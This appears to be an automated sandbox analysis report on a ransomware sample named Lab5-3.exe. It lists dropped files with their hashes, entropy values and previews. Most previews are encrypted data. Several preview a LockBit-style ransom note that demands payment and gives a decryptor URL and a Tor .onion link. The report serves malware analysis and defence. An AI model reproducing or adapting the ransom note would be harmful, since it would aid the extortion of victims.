                                                                                                          Preview:}!...4U......q..sj>M.-T............9p..y..-.=%A.<)..*.R..:DW..:[.3......mGx._.RPX..N\w.?z.....|.&.J..uVy..@._..V.:Y..a.'....&.S\...[...$d.F......q..M.P.B6...tII...;>.:..g1.....W..,-...+..mG1....sX"7......|......1.....u.W...6....Z.."..S.."\J.Raj...e..]h$0..X..%A.%/.h../l.m4."..!.D.o,V{AhN..|.........R.W.....q.9........>c.X.R...<.X..Cfk.p...p.Zz@.BJhy..B...F..oY....^..g[E.I.G. g...+.Xd.c..........[.-4.B.fx|.3......hR.>d.;".$r..s...;;.....T...I'....8k....';P(.3n%.@O..HM..1.X.............2..a?.+u..S.X..$...yw....h...[.AIu.......qJ.u..y..y.v..=:.5.....G...{..zs...>.x.>.9p.8..."&.|...jnL.p...3......A...6.>...... ....a+../d..?.{..B...r-....w..^r.pzoT.P....O..t....2.iP.B.9W....'%.W...m.X.......5.U..j,\.^[.I3.cp.'.F.}4.*.t..v1..hW.^j..k..X*../...|......;p..G.....O...t...w..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.907893459423922
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:FYhOmdspnTEpDHfUTid3hBaUoSGFcmeykEdEElU92i:FYhpsTEqGx0uKeY2ElUJ
                                                                                                          MD5:B78E7773FE0C0056172992009F875F75
                                                                                                          SHA1:9236E517F6A9E8CE6EE55651071CEA0CFA9FD195
                                                                                                          SHA-256:C53C09126DDB2DEEF0CFD19AEF60B1B9E9A9CE6901AE04B11C8C2FBE87E3E19F
                                                                                                          SHA-512:16129D376B6C83C0C021F805AA04181FD592E6D4124D0DBE6A9D1159C0FC9177B2098D8B8E0E0E771EE951F414DE3F73AD0C52C50F281FB54F6D426DB3B77A1C
                                                                                                          Malicious:false
                                                                                                          Preview:p.4..5./5.r$T.9eT...)%....Qp..e.,Q.Uu~b]..1..ivj...!.9....mO.....1K..^..*[Q./@%.5.-.M....+Q...bl+z..C...x.].j.%KK.."5M.....s........z.SR...D?..B.k.4..F...in..#.^s.Q...{]v.g.T@....9.Qwm.-d..T..i.Ww ....f.z......-.W2T.:..I'..+x.6.....<..O.y.CX..3y.^..U...s2...W..b..&2..l_.....Y....5.7GO...!x.....R...C...*N..........:.@..%.....x...H.%8..`..!..i.>.....>.......xx.>{-&....u|.....5....0..h.X..Y..+...'....8.P.... ..%..^vQ....pp...c.X...(g.n...O.......3..p\......q/...c..B............/..4.H...0g.........k.aQ.F..#..x.~o.q.o..^..\..k...........j(...C..?...@.?.9p...,....mb+hZ.y.....Q.u...@=....<...k.)j.. ..W..tFEi,..2...%gph.C.##,.:.d.>...;Y.....HL...'.d...y....h.....{s.>...`8....h?...S...e..8...Z7.8.........m.}.}.w;H....7l..Y...t.|C....4......j...........O.xr.q5...b..........u...rcdv.J0..ob....o.9..M....42.9..Q.:k......V..Y.U.w.. ...(..C2.q_..E.=.d.ql.....L..pt...r.PEQN.'.<.V.+R]0YY..F....h...p.E...^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.930234480666915
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1v/JQFjUL/XIcUMOuQl4yPNH9kCHfUTid3hBaUoSGFcmeykEdEElU92i:h/Wm/48LQeyPp29Gx0uKeY2ElUJ
                                                                                                          MD5:F488A6A91B06E06960C968830AC032CA
                                                                                                          SHA1:DD6486067CD88B625E62B85A4E5ED033918AD651
                                                                                                          SHA-256:92E8AE751FFE35047F554D8F06692965C4605D02061E5301F3F53AED636AB15D
                                                                                                          SHA-512:CFB0D5F8F7949BF225CA7EF5A066BDE5F9AC1C3265B9285FA2B362224B3518C82057C772AA9A342ACFC93D0DB3DA4F04E5FCE5D2CBE4716E34E709300196CFC5
                                                                                                          Malicious:false
                                                                                                          Preview:.~wU#.......m..01.a."n0}.....c....5...>....'|#w......t=.R..X./...i....' .....T.......60.... 2sB.H.E.{.2...|...[.j.v(O<...W.7.a.X.qp.%,B>.....:$ZL.............t.h..$Y..."d....M)D. ...BZ.o.o$;............?.....IA;..1.X.......6..nF.:.I.,s.k.hfo..e5..>....g......5...C.@...Z.e..........d...3.....P...<.:......SF.5&..wF..9......6.Q.Df..r).,.6...:...>".r....o{....q....A~....D..e.....L.F.....?.2...e.....0.@b$.=.D..!...".Ez..3.u..yL.)nT...<!..B(.|.A..,.\I....}A.0*.!....u...z.R.....*.,..../U7R...l..../.q....Q..i..9.U..@..M....d/H..z....WP5..!..a.....w.(...*..",.....M..L.Q..r.LW...F...iY+..Bf.L........wn...yaP..].*.L..M^\.A{]xA...+...........o`.2..%.o..p...5....{..@.......|.k.~.0...?g..J."q..1._...n.[..^....mo...o..0~h..O..._..)CCW..E....%...mVqw......3..2rZ.u`....r.:..._..n';~..h..6..v.A..O.;j.,nJBU..CI.u..P.......k.K.1V.o...L7.A.....g St.J....i....B~5E(W...z...ay...eX.sU..6.o...Z)'..#...U..u...d.....w..o..T.N..]..e..?9jo2.^...0..pj.ZE.}....`.....DslS.rk
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.916285794811253
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9b/ZEir9t/u0HfUTid3hBaUoSGFcmeykEdEElU92i:9zZEc1qGx0uKeY2ElUJ
                                                                                                          MD5:0A5310795903CC92ACD80E79AD862254
                                                                                                          SHA1:7111260243BAB27BFA09A32B9FA25EB6B9286BA4
                                                                                                          SHA-256:F51060F28B3AF0F5CFF172903F18FCD38B066689B3E2CD1D0087823AC8111F7A
                                                                                                          SHA-512:06D0039CD9562417B74158E4E217E0C03BFAF6E322540F4FA34A35582BB1D42EB0D7221589C1E012743140CB3C48C2027B414C50695D54FD3144254673E62A8B
                                                                                                          Malicious:false
                                                                                                          Preview:_..A..jp.S -<..M.<n..}.x.......v>.......T..lr..[sl2...../..gz.5!"..V}... '....^.=I@.a..?....(6...?...}!.x+!..4.7...7K..#.p..+...1........j...{.K#.._T...B..9.j..F)...`..H.yl:r+..n.h.C.X.8....S .j.!aA.8.f.......z...<.A_.s.G..]....cl,...g.,....~.E}....&.=..ds...0..f^.|..!..\:#..f........y*.....<.pRNx.S......./.....>+..xh.o.W..P.$h ..L..C..H.$.=...c,..L?.!.@...z,..4.Z)P.p..b....B.W.`.~.g(9.....`m(...~...cE.l...~.4.6..8u6....?i.J..,..T..v.C|C.1o .O...7.Q....j....R.]h.i. 9.G......l..J.o..m..$.t.>X..*y...JX.D.h..).c...{.S8.h......(.0.x..\Z|.(..1*.d..$..k.P.0az..\.tx..mv..\.....x-a0.7*....E..j.....R....J..R..YC.57=.......N......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.910174032296238
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:s8F8tzK6XcHfUTid3hBaUoSGFcmeykEdEElU92i:s8FMjbGx0uKeY2ElUJ
                                                                                                          MD5:2DB8A88F3E072C1946798D1845B1B301
                                                                                                          SHA1:D0BED9FA0D7BF29F8281789CB34B8E5EFE193329
                                                                                                          SHA-256:B6228DA60055AC46EC9CCF29C894A371A8A809A3FF2B7BF6D6369F48052811B9
                                                                                                          SHA-512:B29A144D44EAA9F713595219E63DC1EB2D3C7BB74DECB0B942C819F326E7B73D04D5BC800BF522A0FD4669E977E0B14F4DBF0F2D1CBA529D090592DC7BC062BC
                                                                                                          Malicious:false
                                                                                                          Preview:..*.Q....t'1.Es.._........$.W.g_.A.A...S......0...).S....;|.L..U..vJ....W....u...2.....<B6.8.0.J....J.^$z.Tu.4..x.4vzW.\....N6.....R..`... "j....."..\~%.4.~.7?.J.q\...c.C.!.3.y.B....?......8@..\\E.uU..L".......X...?h.z.@K..NCh;...........~7^)/..eS......j.j...$...:M......J..q....B#zf.`.+w.[e.GkZ..6tc."......g...B.>5.b.."..-...z...0N(?......F...,.n..l.....`0....sT.r..z..X7.?L..tX..Y.T./.,...lN.x.x.~..].v/...?......I..^.t...z........-._.F.8.....*uX.KA{..a........_S.D@r3\.u..........NI.e...V...._r....n.S~a...GpA..._..Yq.D..\..?p_K..U....![q.;d.Z..q.i.upa"Y.q.K..}.I.iI...S.M.Q..x....o.@qR....L..?vw.:.$..t............Q........:%c..a....I t.Vg.,...j.4.........r.......`.#.... A%.@v..........L........E...O.....Nj$.>&C.T...-.I.}_5V..;..-r....i..n..V...8...?W.1.r.L[....>..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.897059458486439
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HVuq4RwGZR2oPVTsHfUTid3hBaUoSGFcmeykEdEElU92i:1uq4CGn2oPVTrGx0uKeY2ElUJ
                                                                                                          MD5:D2B55BADB9E5499E17C25639CECB599E
                                                                                                          SHA1:9FC9B5F62EB985D58C547F2143B054C6E0D51D02
                                                                                                          SHA-256:CA652466CCE75470A781443813856F6F4194BEA28742BB21C0F47AB9AE8A3444
                                                                                                          SHA-512:84159FACB5892AFE659F10E5B05AB2EEB7AF2072422E87E478592B75C0D7646641A7AAC9185C3AEE91250B482B766CC34FB25DB39615FD21D233C16231494272
                                                                                                          Malicious:false
                                                                                                          Preview:.2.....Y.,.......o..........%..I...M..34.vi(...SE...Q..-].6..m{...R....c.......Q.%...a....0..Li.......e..h.B...).t..B...(.~.i...j......L..s..LP...`.....aX......S.e.BF.....z.h...D.t...}BJ)..2<.H...h.*+c.(..;R...f81f.Ru.%....{....Ce..%.V.S_..'.pfo._.6...h...t...f./.(C:C....g.y......r.......K.......j.. ..:..N|d.&!S..e.E.ns9.0.J..s4..=>.#..e"..x..%.l.s....>..<$.7"..../..x.....5.....j..:......O.A..n.t..,Y.ow;D...i.*B...,.;.D.M.,......Pp..6..MV."..+pT.../.jB..~.i..p."...T.4.o.x...V;...k.VE...v...``.f...n*......F....#..n......YMJq..M2...#.Y.........j.H..%.cW..q..D|..]...%.+F.....C...{X.^..........@.7X~H.;....s...}...JJ....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.9052541312798175
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:CMyiRFR1APUbsolHfUTid3hBaUoSGFcmeykEdEElU92i:ChIUPo+Gx0uKeY2ElUJ
                                                                                                          MD5:9EFA34A3C356B9F48BC783B2FF6590CA
                                                                                                          SHA1:E373E9D58FE78BFBAD5B775BF9C3CB9C1A1783DC
                                                                                                          SHA-256:412E7D5CA72D0822B4904BED730119BAD878B2471E66BE4877EE3B19E16CDE09
                                                                                                          SHA-512:E6050D39B73E94320B2142A9A29F387CF3E7F18F5BC9207593CA1A39F395884ED0CBF8AF054175B4A418EABE86ADBE08CE0C51F7EC1B4026938DC47852F9C982
                                                                                                          Malicious:false
                                                                                                          Preview:..{'...~....HV.....4.'....p=Y...PG.Q..g.....0..JcY..5.........*i..-g...OP..UT.)..$.j..@...2..L.3..L..N......QG...j.]......L...<}.....NI..b|.h.....2x..).X.FD.R`_5..}.7.e....S1_'K..r:....;9.Q..(...?...|..P.j..D..............*...<E.{^..d.)..I.:.,....I..+..Q.I..]j85....G6.G.!.>(..[..d\[.f>K.L(..).......{..s.-d....2..z..0.z7E........C.y$.N......dn/..g...=U...=..p'.~,..YMR..@........K.p.G...e+;.`...G....6F.e..'...C........}.fi..<..+..1f...[.}...o..(........(..-8v2.g.e....$...&k.V...k...........t.......OH...j...0.c.gC.....C.1-....\!3.(..?..u.Ht.].(.^4.......GEs.\L..+..Srg.a...o.C^..:..5.y.....}.{.olo..V.J.x.eE."7R.1...1.L. .qC.r.M&.x.t-ia@l.g.qW."...-.{..kBR.S...nH...|.."76.E4..........5......)...`....\...A...jY@L.*../(.@.0..F....-...T...F|K...'...QDB...F..z.N...1.K.){X..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.937129220779843
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6rJotDoOsAXD72jXSItTAhu0HfUTid3hBaUoSGFcmeykEdEElU92i:2JoYAD72jXr0YGx0uKeY2ElUJ
                                                                                                          MD5:F1ACB507A4D7D38B739487009F17A5D2
                                                                                                          SHA1:09ABD59BC1E57F5A5D0EA747932AA18F969E3904
                                                                                                          SHA-256:0E5F5FD0554A05220D63B970A74AB30BEBDB936C318C21BF73293DCF85672404
                                                                                                          SHA-512:7C461863FAD6732B9B41D0DB896F660035E37E025C91328C01D1BA8674E9A2287F12F65D209C71A5DAB981DDFC8817207E3F80D7320C847594BA82D9145733AB
                                                                                                          Malicious:false
                                                                                                          Preview:.RG2...R.$.....T.)t.u.....o5.......=.....`...%"...]3{.&......D.tj.x.g}.N{..n.X....!*-E}.D....!BV.q.......M.[.bk..C...|.../...j.....h..F.i...s...(...B.,..9S;,.....6.......@._..X?h...oT.3)....p..J....V5o.2Z..4XP!~...E..].N.{..QG%.W>...DZ....5...a.K|...<3u....G......0.tn._...S.ct9...<..".gz...s.#...3....vS....OK....M3.._mT.T,.6..U Wt...Oi.... C...R.g.by.|..t..(s./..2p....>Tz....VeB..?...x.%.m......S......V..i...../o.A*...|.#[U4$)..0...5N...c.U.Q.c.....[^.O..V.j..=.p.....~......r.B.EKI....m"...X".....0..!}e0.....+.?....-..a...m............b..v....2.....Vk...@..z....w.>"..7_.}.G>.A..ik.Um.......a..:H.hAe......P.....`C.=`..=.C.....V.c2.<^...pje.;..Q..j..._..n..`.\&.6..$=;|b...`..T.... .[.......}..9c.I.#...]u.........aH.a.Fx.+C....Pp{....U.../...<L..........33...Q.vw.H.].1....]?..>.6...._.+.K....iS7....1..V.S^X.-"+....s...f..[...9.'.fpM.../..B.....I.nZ..=U.M.....N..9T.)|*..X..E.d.....^.}...\.~.$...:...ix{?....?....Ga...F...............y..x....3.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.944426534002102
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3RKVlpnl7fSmcPVrCvAt+oGmkHfUTid3hBaUoSGFcmeykEdEElU92i:4TbaNrgNoGmjGx0uKeY2ElUJ
                                                                                                          MD5:579AADC562E59A261596497460F7D5B8
                                                                                                          SHA1:13E3C7AA47D416C27923D9CDE3B97765FF32557E
                                                                                                          SHA-256:2C99931B4C0B2AB34AE45B16C7E8E0BACE5FC053CE7B8E0829FAE6085FCF7671
                                                                                                          SHA-512:BCE88582102226B7AD24354DA9DE2494F7C06729ADFF04BAF5EA3F5DB4757F90D3B6025904348DDB360342B569E7468F791FD7FE50090A3ECCDADEE875140A65
                                                                                                          Malicious:false
                                                                                                          Preview:..n......+V!F.[p{.a.z.A..+v.uj..1..Q.t..Y'.H.....=!..*..%..hj.}mr.....4e.....9..GN..N........A.j.s.=Z....I.S]C.#..E4M..5cyX.-.$..R...tx...L..21....%...L.M..j)S.VWa..........H-m.y....8^...!..0i..T+.W.78..&...l..+t..A..P...H...^4..4s.i..-C.....X|...9...Db....:...T..P.!.|.f.....J.c{...c._W.N....@.[i.p...k..S....[P^\/i-...Mu..B.g.4...zz...#..D.....l....}.....}..Tb>....]......%..y..?.C...&..>.qI.T..5....we|9..`.v.@.iiw#.X.&...../.9......*$]A.Oay.a`%..!.Z.o.Rt.u=9`.1t4..?..C.=y.5v.....R.."....b..d.....{4K=.$m...3.gX..e:..z.d?.L../|..../.)TJ.Y.H`..RF...>.....W.....O.EU...~,....&..?...^.w5K...&....,g....s.ni......#...\.R}-/..MJ36Cd7..I....h:..qL..........2.hF..`.V.c9%}...r....2eW...5.>.._.o.3..v3zjb.y...... ./NW9..].cs...._.,.z.....Za..H..*...n.3....".I..%w.D9.....m.n...l.... .s.E....# d..o.....H.6]8:d.v:.......^...#..C..s.|.V........e^!'h..V..[.......Ye....v..x.N3v.qy.O...-.N...M.b...s..$_.G....."d..:........&..j.]-.cH.u.P.1.k....*\V..@(..p..fR.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2736
                                                                                                          Entropy (8bit):7.94182569413047
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:srF8x+fPWdoa9UjoJj3mdd0Qv2g+wPjHfUTid3hBaUoSGFcmeykEdEElU92i:Jx+fPWdVCoJbmF+lGx0uKeY2ElUJ
                                                                                                          MD5:738B8B2FA8E41D45AE129AA4722A375F
                                                                                                          SHA1:CEF6B650702DA564E416ED279BAE590BE6AD8AE5
                                                                                                          SHA-256:4F602E44FFA9325D31CDB812B7700C8862558ADE25CE92F52263882A5F95CF20
                                                                                                          SHA-512:A2EF64362DAF5958AEB09A4CC0488221BDE9C04290597D3140909F695E025610E3B83168D09003FA29C8F34946C31C6954D3261E3693EC76922034B0DA93969F
                                                                                                          Malicious:false
